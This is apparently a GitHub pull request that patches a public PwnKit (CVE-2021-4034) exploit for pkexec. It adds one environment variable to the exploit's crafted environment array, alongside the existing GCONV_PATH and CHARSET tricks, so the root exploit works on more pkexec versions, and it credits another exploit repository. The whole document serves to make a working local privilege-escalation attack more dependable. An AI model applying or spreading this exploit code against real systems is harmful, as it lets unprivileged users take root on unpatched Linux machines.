### PR TITLE
Fix for versions where GIO_USE_VFS is set to local

### DIFF
--- a/cve-2021-4034.c
+++ b/cve-2021-4034.c
@@ -10,6 +10,7 @@ int main(int argc, char **argv)
 		"PATH=GCONV_PATH=.",
 		"SHELL=/lol/i/do/not/exists",
 		"CHARSET=PWNKIT",
+		"GIO_USE_VFS=",
 		NULL
 	};
 	return execve("/usr/bin/pkexec", args, environ);


### PR DESCRIPTION
This was required to make this work on my version of pkexec.

Credit to https://github.com/PeterGottesman/pwnkit-exploit 